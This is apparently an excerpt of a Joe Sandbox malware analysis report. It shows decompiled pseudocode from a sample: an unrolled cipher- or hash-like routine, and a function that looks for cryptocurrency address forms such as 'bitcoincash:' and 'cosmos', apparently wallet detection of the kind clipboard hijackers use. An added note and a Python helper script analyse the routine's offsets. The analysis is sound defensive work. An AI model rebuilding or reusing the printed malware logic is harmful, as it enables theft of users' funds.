                                                                                  					_t2107 = _a4;
                                                                                  					_v12 =  *(_t1502 + _t1854 * 8 - 0xb0) &  *(_t2107 + _t1675 * 8 - 0x1d0) ^ _v12;
                                                                                  					_v8 =  *(_t1502 + _t1854 * 8 - 0xac) &  *(_t2107 + _t1675 * 8 - 0x1cc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1678 = _v16;
                                                                                  					_t2108 = _a4;
                                                                                  					 *(_t2108 + 0x48 + _t1678 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2108 + 0x4c + _t1678 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1679 = _v16;
                                                                                  					_t1863 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1863 + _t1679 * 8 - 0x278);
                                                                                  					_v8 = _v8 ^  *(_t1863 + _t1679 * 8 - 0x274);
                                                                                  					_t1680 = _v16;
                                                                                  					_t1864 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1864 + _t1680 * 8 - 0x38);
                                                                                  					_v8 = _v8 ^  *(_t1864 + _t1680 * 8 - 0x34);
                                                                                  					_t1681 = _v16;
                                                                                  					_t1865 = _a4;
                                                                                  					_t1512 = _v16;
                                                                                  					_t2113 = _a4;
                                                                                  					_v12 =  *(_t1865 + _t1681 * 8 - 0x40) &  *(_t2113 + _t1512 * 8 - 0x58) ^ _v12;
                                                                                  					_v8 =  *(_t1865 + _t1681 * 8 - 0x3c) &  *(_t2113 + _t1512 * 8 - 0x54) ^ _v8;
                                                                                  					_t1866 = _v16;
                                                                                  					_t1513 = _a4;
                                                                                  					_t1685 = _v16;
                                                                                  					_t2114 = _a4;
                                                                                  					_v12 =  *(_t1513 + _t1866 * 8 - 0xa8) &  *(_t2114 + _t1685 * 8 - 0x1c8) ^ _v12;
                                                                                  					_v8 =  *(_t1513 + _t1866 * 8 - 0xa4) &  *(_t2114 + _t1685 * 8 - 0x1c4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1688 = _v16;
                                                                                  					_t2115 = _a4;
                                                                                  					 *(_t2115 + 0x50 + _t1688 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2115 + 0x54 + _t1688 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1689 = _v16;
                                                                                  					_t1875 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1875 + _t1689 * 8 - 0x270);
                                                                                  					_v8 = _v8 ^  *(_t1875 + _t1689 * 8 - 0x26c);
                                                                                  					_t1690 = _v16;
                                                                                  					_t1876 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1876 + _t1690 * 8 - 0x30);
                                                                                  					_v8 = _v8 ^  *(_t1876 + _t1690 * 8 - 0x2c);
                                                                                  					_t1691 = _v16;
                                                                                  					_t1877 = _a4;
                                                                                  					_t1523 = _v16;
                                                                                  					_t2120 = _a4;
                                                                                  					_v12 =  *(_t1877 + _t1691 * 8 - 0x38) &  *(_t2120 + _t1523 * 8 - 0x50) ^ _v12;
                                                                                  					_v8 =  *(_t1877 + _t1691 * 8 - 0x34) &  *(_t2120 + _t1523 * 8 - 0x4c) ^ _v8;
                                                                                  					_t1878 = _v16;
                                                                                  					_t1524 = _a4;
                                                                                  					_t1695 = _v16;
                                                                                  					_t2121 = _a4;
                                                                                  					_v12 =  *(_t1524 + _t1878 * 8 - 0xa0) &  *(_t2121 + _t1695 * 8 - 0x1c0) ^ _v12;
                                                                                  					_v8 =  *(_t1524 + _t1878 * 8 - 0x9c) &  *(_t2121 + _t1695 * 8 - 0x1bc) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1698 = _v16;
                                                                                  					_t2122 = _a4;
                                                                                  					 *(_t2122 + 0x58 + _t1698 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2122 + 0x5c + _t1698 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1699 = _v16;
                                                                                  					_t1887 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1887 + _t1699 * 8 - 0x268);
                                                                                  					_v8 = _v8 ^  *(_t1887 + _t1699 * 8 - 0x264);
                                                                                  					_t1700 = _v16;
                                                                                  					_t1888 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1888 + _t1700 * 8 - 0x28);
                                                                                  					_v8 = _v8 ^  *(_t1888 + _t1700 * 8 - 0x24);
                                                                                  					_t1701 = _v16;
                                                                                  					_t1889 = _a4;
                                                                                  					_t1534 = _v16;
                                                                                  					_t2127 = _a4;
                                                                                  					_v12 =  *(_t1889 + _t1701 * 8 - 0x30) &  *(_t2127 + _t1534 * 8 - 0x48) ^ _v12;
                                                                                  					_v8 =  *(_t1889 + _t1701 * 8 - 0x2c) &  *(_t2127 + _t1534 * 8 - 0x44) ^ _v8;
                                                                                  					_t1890 = _v16;
                                                                                  					_t1535 = _a4;
                                                                                  					_t1705 = _v16;
                                                                                  					_t2128 = _a4;
                                                                                  					_v12 =  *(_t1535 + _t1890 * 8 - 0x98) &  *(_t2128 + _t1705 * 8 - 0x1b8) ^ _v12;
                                                                                  					_v8 =  *(_t1535 + _t1890 * 8 - 0x94) &  *(_t2128 + _t1705 * 8 - 0x1b4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1708 = _v16;
                                                                                  					_t2129 = _a4;
                                                                                  					 *(_t2129 + 0x60 + _t1708 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2129 + 0x64 + _t1708 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1709 = _v16;
                                                                                  					_t1899 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1899 + _t1709 * 8 - 0x260);
                                                                                  					_v8 = _v8 ^  *(_t1899 + _t1709 * 8 - 0x25c);
                                                                                  					_t1710 = _v16;
                                                                                  					_t1900 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1900 + _t1710 * 8 - 0x20);
                                                                                  					_v8 = _v8 ^  *(_t1900 + _t1710 * 8 - 0x1c);
                                                                                  					_t1711 = _v16;
                                                                                  					_t1901 = _a4;
                                                                                  					_t1545 = _v16;
                                                                                  					_t2134 = _a4;
                                                                                  					_v12 =  *(_t1901 + _t1711 * 8 - 0x28) &  *(_t2134 + _t1545 * 8 - 0x40) ^ _v12;
                                                                                  					_v8 =  *(_t1901 + _t1711 * 8 - 0x24) &  *(_t2134 + _t1545 * 8 - 0x3c) ^ _v8;
                                                                                  					_t1902 = _v16;
                                                                                  					_t1546 = _a4;
                                                                                  					_t1715 = _v16;
                                                                                  					_t2135 = _a4;
                                                                                  					_v12 =  *(_t1546 + _t1902 * 8 - 0x90) &  *(_t2135 + _t1715 * 8 - 0x1b0) ^ _v12;
                                                                                  					_v8 =  *(_t1546 + _t1902 * 8 - 0x8c) &  *(_t2135 + _t1715 * 8 - 0x1ac) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1718 = _v16;
                                                                                  					_t2136 = _a4;
                                                                                  					 *(_t2136 + 0x68 + _t1718 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2136 + 0x6c + _t1718 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1719 = _v16;
                                                                                  					_t1911 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1911 + _t1719 * 8 - 0x258);
                                                                                  					_v8 = _v8 ^  *(_t1911 + _t1719 * 8 - 0x254);
                                                                                  					_t1720 = _v16;
                                                                                  					_t1912 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1912 + _t1720 * 8 - 0x18);
                                                                                  					_v8 = _v8 ^  *(_t1912 + _t1720 * 8 - 0x14);
                                                                                  					_t1721 = _v16;
                                                                                  					_t1913 = _a4;
                                                                                  					_t1556 = _v16;
                                                                                  					_t2141 = _a4;
                                                                                  					_v12 =  *(_t1913 + _t1721 * 8 - 0x20) &  *(_t2141 + _t1556 * 8 - 0x38) ^ _v12;
                                                                                  					_v8 =  *(_t1913 + _t1721 * 8 - 0x1c) &  *(_t2141 + _t1556 * 8 - 0x34) ^ _v8;
                                                                                  					_t1914 = _v16;
                                                                                  					_t1557 = _a4;
                                                                                  					_t1725 = _v16;
                                                                                  					_t2142 = _a4;
                                                                                  					_v12 =  *(_t1557 + _t1914 * 8 - 0x88) &  *(_t2142 + _t1725 * 8 - 0x1a8) ^ _v12;
                                                                                  					_v8 =  *(_t1557 + _t1914 * 8 - 0x84) &  *(_t2142 + _t1725 * 8 - 0x1a4) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1728 = _v16;
                                                                                  					_t2143 = _a4;
                                                                                  					 *(_t2143 + 0x70 + _t1728 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2143 + 0x74 + _t1728 * 8) = _v8 ^ _v8;
                                                                                  					_v12 = _v28;
                                                                                  					_v8 = _v24;
                                                                                  					_t1729 = _v16;
                                                                                  					_t1923 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1923 + _t1729 * 8 - 0x250);
                                                                                  					_v8 = _v8 ^  *(_t1923 + _t1729 * 8 - 0x24c);
                                                                                  					_t1730 = _v16;
                                                                                  					_t1924 = _a4;
                                                                                  					_v12 = _v12 ^  *(_t1924 + _t1730 * 8 - 0x10);
                                                                                  					_v8 = _v8 ^  *(_t1924 + _t1730 * 8 - 0xc);
                                                                                  					_t1731 = _v16;
                                                                                  					_t1925 = _a4;
                                                                                  					_t1567 = _v16;
                                                                                  					_t2148 = _a4;
                                                                                  					_v12 =  *(_t1925 + _t1731 * 8 - 0x18) &  *(_t2148 + _t1567 * 8 - 0x30) ^ _v12;
                                                                                  					_v8 =  *(_t1925 + _t1731 * 8 - 0x14) &  *(_t2148 + _t1567 * 8 - 0x2c) ^ _v8;
                                                                                  					_t1926 = _v16;
                                                                                  					_t1568 = _a4;
                                                                                  					_t1735 = _v16;
                                                                                  					_t2149 = _a4;
                                                                                  					_v12 =  *(_t1568 + _t1926 * 8 - 0x80) &  *(_t2149 + _t1735 * 8 - 0x1a0) ^ _v12;
                                                                                  					_v8 =  *(_t1568 + _t1926 * 8 - 0x7c) &  *(_t2149 + _t1735 * 8 - 0x19c) ^ _v8;
                                                                                  					L0040F198();
                                                                                  					_v12 = _v12 ^ _v12;
                                                                                  					_v8 = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					_t1738 = _v16;
                                                                                  					_t2150 = _a4;
                                                                                  					 *(_t2150 + 0x78 + _t1738 * 8) = _v12 ^ _v12;
                                                                                  					 *(_t2150 + 0x7c + _t1738 * 8) = _v8 ^ _v8;
                                                                                  					L0040F19E();
                                                                                  					L0040F198();
                                                                                  					_v28 = _v28 ^ _v28 ^ _v28 &  *0x411130;
                                                                                  					_v24 = _v24 ^ _v24 ^ _v24 &  *0x411134;
                                                                                  					_v16 = _v16 + 0x10;
                                                                                  					_v32 = _v32 + 0x10;
                                                                                  				}
                                                                                  				return _t1396;
                                                                                  			}
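Note on the pseudocode above, with an added helper script that is not part of the Joe Sandbox report or of the sample itself. Every unrolled round in this function has the same shape: it seeds a 64-bit accumulator (the `_v12`/`_v8` dword pair) from `_v28`/`_v24`, XORs in two words of the state block at `_a4`, XORs in two AND-products of state words, calls `L0040F198` and `L0040F19E`, and stores the result at `_a4 + 0x30 + _v16 * 8`, then `+ 0x38`, and so on up to `+ 0x78`, after which `_v16` advances by 0x10 words. As printed, each store writes `_v12 ^ _v12`, which is zero, so the decompiler has lost the data flow through the two helper calls and the stored value cannot be read off this listing; the XOR/AND chain before the calls is fully visible, though, and its byte offsets are worth normalising into word distances to confirm that all copies of the round body are the same loop step before anyone hand-derives the function. The script below does that: it parses the decompiler's `*(base + index * 8 - 0xNN)` operands, converts each tap to a distance behind the word being written, and fails if any round disagrees. Its input is three rounds copied from the listing above (the `_v12` lines only; the `_v8` lines carry the same offsets plus 4). Two assumptions, both consistent with the lines shown: the `_v12`/`_v8` pair is one 64-bit word, and the same index register drives the loads and the store within a round.

```python
import re
from dataclasses import dataclass, field

# Constructed input: three of the unrolled rounds copied from the decompiled
# pseudocode in this report (low-dword `_v12` lines and each round's store;
# the `_v8` high-dword lines carry the same offsets + 4 and are left out).
SAMPLE = """
_v12 = _v28;
_v12 = _v12 ^  *(_t1839 + _t1659 * 8 - 0x288);
_v12 = _v12 ^  *(_t1840 + _t1660 * 8 - 0x48);
_v12 =  *(_t1841 + _t1661 * 8 - 0x50) &  *(_t2099 + _t1490 * 8 - 0x68) ^ _v12;
_v12 =  *(_t1491 + _t1842 * 8 - 0xb8) &  *(_t2100 + _t1665 * 8 - 0x1d8) ^ _v12;
L0040F198();
_v12 = _v12 ^ _v12;
L0040F19E();
 *(_t2101 + 0x40 + _t1668 * 8) = _v12 ^ _v12;
_v12 = _v28;
_v12 = _v12 ^  *(_t1851 + _t1669 * 8 - 0x280);
_v12 = _v12 ^  *(_t1852 + _t1670 * 8 - 0x40);
_v12 =  *(_t1853 + _t1671 * 8 - 0x48) &  *(_t2106 + _t1501 * 8 - 0x60) ^ _v12;
_v12 =  *(_t1502 + _t1854 * 8 - 0xb0) &  *(_t2107 + _t1675 * 8 - 0x1d0) ^ _v12;
L0040F198();
_v12 = _v12 ^ _v12;
L0040F19E();
 *(_t2108 + 0x48 + _t1678 * 8) = _v12 ^ _v12;
_v12 = _v28;
_v12 = _v12 ^  *(_t1923 + _t1729 * 8 - 0x250);
_v12 = _v12 ^  *(_t1924 + _t1730 * 8 - 0x10);
_v12 =  *(_t1925 + _t1731 * 8 - 0x18) &  *(_t2148 + _t1567 * 8 - 0x30) ^ _v12;
_v12 =  *(_t1568 + _t1926 * 8 - 0x80) &  *(_t2149 + _t1735 * 8 - 0x1a0) ^ _v12;
L0040F198();
_v12 = _v12 ^ _v12;
L0040F19E();
 *(_t2150 + 0x78 + _t1738 * 8) = _v12 ^ _v12;
"""

WORD = 8  # every operand is base + index*8, so the state is 64-bit words

# Shapes of the three line kinds that carry offsets (lines are stripped first).
LOAD = r"\*\(_t\d+ \+ _t\d+ \* 8 - (0x[0-9a-f]+)\)"
LINEAR = re.compile(r"^_v12 = _v12 \^\s+" + LOAD + r";$")
PRODUCT = re.compile(r"^_v12 =\s+" + LOAD + r" &\s+" + LOAD + r" \^ _v12;$")
STORE = re.compile(r"^\*\(_t\d+ \+ (0x[0-9a-f]+) \+ _t\d+ \* 8\) = _v12 \^ _v12;$")
ROUND_START = "_v12 = _v28;"


@dataclass
class Round:
    linear: list = field(default_factory=list)    # byte offsets of plain XOR taps
    products: list = field(default_factory=list)  # (off_a, off_b) of ANDed taps
    out: int = -1                                 # byte offset of the stored word


def parse_rounds(text):
    """Split the decompiler text into rounds; anything else (the helper calls,
    the `_v12 ^ _v12` zeroing, temporaries) is ignored on purpose."""
    rounds, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == ROUND_START:
            cur = Round()
        elif cur is None:
            continue
        elif m := LINEAR.match(line):
            cur.linear.append(int(m.group(1), 16))
        elif m := PRODUCT.match(line):
            cur.products.append((int(m.group(1), 16), int(m.group(2), 16)))
        elif m := STORE.match(line):
            cur.out = int(m.group(1), 16)
            rounds.append(cur)
            cur = None
    return rounds


def relative_taps(r):
    """Express each tap as a distance, in words, behind the word being written.
    A load at index*8 - off and a store at index*8 + out use the same index
    register, so they are (out + off) bytes apart whatever the loop counter is."""
    if r.out < 0:
        raise ValueError("round has no store")

    def dist(off):
        if (r.out + off) % WORD:
            raise ValueError(f"tap at -{off:#x} is not word-aligned")
        return (r.out + off) // WORD

    linear = tuple(sorted(dist(o) for o in r.linear))
    products = tuple(sorted(tuple(sorted(dist(o) for o in p)) for p in r.products))
    return linear, products


def check_unrolled(rounds):
    """Return (tap pattern, output word indices) if every unrolled copy of the
    round body is the same shift-register step; raise if any copy disagrees."""
    patterns = {relative_taps(r) for r in rounds}
    if len(patterns) != 1:
        raise ValueError(f"unrolled rounds disagree: {sorted(patterns)}")
    return patterns.pop(), [r.out // WORD for r in rounds]


if __name__ == "__main__":
    (linear, products), outs = check_unrolled(parse_rounds(SAMPLE))
    print("linear taps:", linear, "product taps:", products, "outputs:", outs)
```

Run on the three copied rounds it reports linear taps 17 and 89 words behind the output, product taps (18, 21) and (31, 67), and output word indices 8, 9 and 15 within the current 16-word block, the same for every round. Whether this step belongs to a known hash or stream cipher is not something the listing settles, and the script does not claim it; its job is to show that the unrolled copies agree, so that the tap pattern can be taken from any one of them, and to flag the helper calls as the place where the decompiler's view of the data flow ends.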
Instruction address column from the report's disassembly view (the instruction text itself was not captured): 0x00406958 0x0040695d 0x00406960 0x00406966 0x00406969 0x00406970 0x00406982 0x00406985 0x0040698b 0x00000000 0x00000000 0x00406994 0x0040699a 0x0040699d 0x004069a0 0x004069b7 0x004069ba 0x004069bd 0x004069c0 0x004069d7 0x004069da 0x004069dd 0x004069e0 0x004069e3 0x004069e6 0x00406a0b 0x00406a0e
                                                                                  0x00406a11
                                                                                  0x00406a14
                                                                                  0x00406a17
                                                                                  0x00406a1a
                                                                                  0x00406a3f
                                                                                  0x00406a42
                                                                                  0x00406a4d
                                                                                  0x00406a58
                                                                                  0x00406a5b
                                                                                  0x00406a66
                                                                                  0x00406a71
                                                                                  0x00406a74
                                                                                  0x00406a77
                                                                                  0x00406a7a
                                                                                  0x00406a81
                                                                                  0x00406a87
                                                                                  0x00406a8a
                                                                                  0x00406a8d
                                                                                  0x00406aa4
                                                                                  0x00406aa7
                                                                                  0x00406aaa
                                                                                  0x00406aad
                                                                                  0x00406abe
                                                                                  0x00406ac1
                                                                                  0x00406ac4
                                                                                  0x00406ac7
                                                                                  0x00406aca
                                                                                  0x00406acd
                                                                                  0x00406af2
                                                                                  0x00406af5
                                                                                  0x00406af8
                                                                                  0x00406afb
                                                                                  0x00406afe
                                                                                  0x00406b01
                                                                                  0x00406b26
                                                                                  0x00406b29
                                                                                  0x00406b34
                                                                                  0x00406b3f
                                                                                  0x00406b42
                                                                                  0x00406b4d
                                                                                  0x00406b58
                                                                                  0x00406b5b
                                                                                  0x00406b5e
                                                                                  0x00406b62
                                                                                  0x00406b69
                                                                                  0x00406b6f
                                                                                  0x00406b72
                                                                                  0x00406b75
                                                                                  0x00406b8c
                                                                                  0x00406b8f
                                                                                  0x00406b92
                                                                                  0x00406b95
                                                                                  0x00406ba6
                                                                                  0x00406ba9
                                                                                  0x00406bac
                                                                                  0x00406baf
                                                                                  0x00406bb2
                                                                                  0x00406bb5
                                                                                  0x00406bd4
                                                                                  0x00406bd7
                                                                                  0x00406bda
                                                                                  0x00406bdd
                                                                                  0x00406be0
                                                                                  0x00406be3
                                                                                  0x00406c08
                                                                                  0x00406c0b
                                                                                  0x00406c16
                                                                                  0x00406c21
                                                                                  0x00406c24
                                                                                  0x00406c2f
                                                                                  0x00406c3a
                                                                                  0x00406c3d
                                                                                  0x00406c40
                                                                                  0x00406c44
                                                                                  0x00406c4b
                                                                                  0x00406c51
                                                                                  0x00406c54
                                                                                  0x00406c57
                                                                                  0x00406c6e
                                                                                  0x00406c71
                                                                                  0x00406c74
                                                                                  0x00406c77
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8e
                                                                                  0x00406c91
                                                                                  0x00406c94
                                                                                  0x00406c97
                                                                                  0x00406cb6
                                                                                  0x00406cb9
                                                                                  0x00406cbc
                                                                                  0x00406cbf
                                                                                  0x00406cc2
                                                                                  0x00406cc5
                                                                                  0x00406cea
                                                                                  0x00406ced
                                                                                  0x00406cf8
                                                                                  0x00406d03
                                                                                  0x00406d06
                                                                                  0x00406d11
                                                                                  0x00406d1c
                                                                                  0x00406d1f
                                                                                  0x00406d22
                                                                                  0x00406d26
                                                                                  0x00406d2d
                                                                                  0x00406d33
                                                                                  0x00406d36
                                                                                  0x00406d39
                                                                                  0x00406d50
                                                                                  0x00406d53
                                                                                  0x00406d56
                                                                                  0x00406d59
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d70
                                                                                  0x00406d73
                                                                                  0x00406d76
                                                                                  0x00406d79
                                                                                  0x00406d98
                                                                                  0x00406d9b
                                                                                  0x00406d9e
                                                                                  0x00406da1
                                                                                  0x00406da4
                                                                                  0x00406da7
                                                                                  0x00406dcc
                                                                                  0x00406dcf
                                                                                  0x00406dda
                                                                                  0x00406de5
                                                                                  0x00406de8
                                                                                  0x00406df3
                                                                                  0x00406dfe
                                                                                  0x00406e01
                                                                                  0x00406e04
                                                                                  0x00406e08
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e18
                                                                                  0x00406e1b
                                                                                  0x00406e32
                                                                                  0x00406e35
                                                                                  0x00406e38
                                                                                  0x00406e3b
                                                                                  0x00406e4c
                                                                                  0x00406e4f
                                                                                  0x00406e52
                                                                                  0x00406e55
                                                                                  0x00406e58
                                                                                  0x00406e5b
                                                                                  0x00406e74
                                                                                  0x00406e77
                                                                                  0x00406e7a
                                                                                  0x00406e7d
                                                                                  0x00406e80
                                                                                  0x00406e83
                                                                                  0x00406ea8
                                                                                  0x00406eab
                                                                                  0x00406eb6
                                                                                  0x00406ec1
                                                                                  0x00406ec4
                                                                                  0x00406ecf
                                                                                  0x00406eda
                                                                                  0x00406edd
                                                                                  0x00406ee0
                                                                                  0x00406ee4
                                                                                  0x00406eeb
                                                                                  0x00406ef1
                                                                                  0x00406ef4
                                                                                  0x00406ef7
                                                                                  0x00406f0e
                                                                                  0x00406f11
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f28
                                                                                  0x00406f2b
                                                                                  0x00406f2e
                                                                                  0x00406f31
                                                                                  0x00406f34
                                                                                  0x00406f37
                                                                                  0x00406f50
                                                                                  0x00406f53
                                                                                  0x00406f56
                                                                                  0x00406f59
                                                                                  0x00406f5c
                                                                                  0x00406f5f
                                                                                  0x00406f84
                                                                                  0x00406f87
                                                                                  0x00406f92
                                                                                  0x00406f9d
                                                                                  0x00406fa0
                                                                                  0x00406fab
                                                                                  0x00406fb6
                                                                                  0x00406fb9
                                                                                  0x00406fbc
                                                                                  0x00406fc0
                                                                                  0x00406fc7
                                                                                  0x00406fcd
                                                                                  0x00406fd0
                                                                                  0x00406fd3
                                                                                  0x00406fea
                                                                                  0x00406fed
                                                                                  0x00406ff0
                                                                                  0x00406ff3
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x0040700d
                                                                                  0x00407010
                                                                                  0x00407013
                                                                                  0x0040702c
                                                                                  0x0040702f
                                                                                  0x00407032
                                                                                  0x00407035
                                                                                  0x00407038
                                                                                  0x0040703b
                                                                                  0x00407060
                                                                                  0x00407063
                                                                                  0x0040706e
                                                                                  0x00407079
                                                                                  0x0040707c
                                                                                  0x00407087
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x00407098
                                                                                  0x0040709c
                                                                                  0x004070a3
                                                                                  0x004070a9
                                                                                  0x004070ac
                                                                                  0x004070af
                                                                                  0x004070c6
                                                                                  0x004070c9
                                                                                  0x004070cc
                                                                                  0x004070cf
                                                                                  0x004070e0
                                                                                  0x004070e3
                                                                                  0x004070e6
                                                                                  0x004070e9
                                                                                  0x004070ec
                                                                                  0x004070ef
                                                                                  0x00407108
                                                                                  0x0040710b
                                                                                  0x0040710e
                                                                                  0x00407111
                                                                                  0x00407114
                                                                                  0x00407117
                                                                                  0x0040713c
                                                                                  0x0040713f
                                                                                  0x0040714a
                                                                                  0x00407155
                                                                                  0x00407158
                                                                                  0x00407163
                                                                                  0x0040716e
                                                                                  0x00407171
                                                                                  0x00407174
                                                                                  0x00407178
                                                                                  0x0040717f
                                                                                  0x00407185
                                                                                  0x00407188
                                                                                  0x0040718b
                                                                                  0x004071a2
                                                                                  0x004071a5
                                                                                  0x004071a8
                                                                                  0x004071ab
                                                                                  0x004071bc
                                                                                  0x004071bf
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071c8
                                                                                  0x004071cb
                                                                                  0x004071e4
                                                                                  0x004071e7
                                                                                  0x004071ea
                                                                                  0x004071ed
                                                                                  0x004071f0
                                                                                  0x004071f3
                                                                                  0x00407218
                                                                                  0x0040721b
                                                                                  0x00407226
                                                                                  0x00407231
                                                                                  0x00407234
                                                                                  0x0040723f
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407254
                                                                                  0x0040725b
                                                                                  0x00407261
                                                                                  0x00407264
                                                                                  0x00407267
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x00407284
                                                                                  0x00407287
                                                                                  0x00407298
                                                                                  0x0040729b
                                                                                  0x0040729e
                                                                                  0x004072a1
                                                                                  0x004072a4
                                                                                  0x004072a7
                                                                                  0x004072c0
                                                                                  0x004072c3
                                                                                  0x004072c6

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID: Y
                                                                                  • API String ID: 673498613-3233089245
                                                                                  • Opcode ID: 2a5d5167951d52ce8f584bbc4de778dcb98c56809701612ab41b57e5b9c64712
                                                                                  • Instruction ID: b315148e9ffe19411831e1efe01d485e7947b0a89cbfd82e3e47e8b0a1ae8d25
                                                                                  • Opcode Fuzzy Hash: 2a5d5167951d52ce8f584bbc4de778dcb98c56809701612ab41b57e5b9c64712
                                                                                  • Instruction Fuzzy Hash: B8D22D79D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630AE95DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00403480(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				int _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t237;
                                                                                  				signed int _t238;
                                                                                  				void* _t391;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = lstrlenW(_a4);
                                                                                  				if(( *_a4 & 0x0000ffff) != 0x31 && ( *_a4 & 0x0000ffff) != 0x33 && ( *_a4 & 0x0000ffff) != 0x58 && ( *_a4 & 0x0000ffff) != 0x44 && ( *_a4 & 0x0000ffff) != 0x30 && ( *_a4 & 0x0000ffff) != 0x4c && ( *_a4 & 0x0000ffff) != 0x72 && ( *_a4 & 0x0000ffff) != 0x6c && ( *_a4 & 0x0000ffff) != 0x54 && ( *_a4 & 0x0000ffff) != 0x74 && ( *_a4 & 0x0000ffff) != 0x68 && ( *_a4 & 0x0000ffff) != 0x51 && ( *_a4 & 0x0000ffff) != 0x52 && ( *_a4 & 0x0000ffff) != 0x4e && ( *_a4 & 0x0000ffff) != 0x41 && ( *_a4 & 0x0000ffff) != 0x53 && ( *_a4 & 0x0000ffff) != 0x7a && ( *_a4 & 0x0000ffff) != 0x73 && ( *_a4 & 0x0000ffff) != 0x71 && ( *_a4 & 0x0000ffff) != 0x63 && ( *_a4 & 0x0000ffff) != 0x34 && ( *_a4 & 0x0000ffff) != 0x61 && ( *_a4 & 0x0000ffff) != 0x46 && ( *_a4 & 0x0000ffff) != 0x47 && ( *_a4 & 0x0000ffff) != 0x62 && ( *_a4 & 0x0000ffff) != 0x55 && ( *_a4 & 0x0000ffff) != 0x45 && ( *_a4 & 0x0000ffff) != 0x42) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				if(( *_a4 & 0x0000ffff) != 0x34) {
                                                                                  					if(( *_a4 & 0x0000ffff) != 0x72) {
                                                                                  						if(StrStrW(_a4, L"bitcoincash:") == 0) {
                                                                                  							if(StrStrW(_a4, L"cosmos") == 0) {
                                                                                  								if(StrStrW(_a4, L"addr") == 0) {
                                                                                  									if(( *_a4 & 0x0000ffff) == 0x55 || ( *_a4 & 0x0000ffff) == 0x45 || ( *_a4 & 0x0000ffff) == 0x42) {
                                                                                  										if(_v8 == 9) {
                                                                                  											goto L63;
                                                                                  										}
                                                                                  										return 0;
                                                                                  									} else {
                                                                                  										if(_v8 < 0x15 || _v8 > 0x38) {
                                                                                  											return 0;
                                                                                  										} else {
                                                                                  											goto L63;
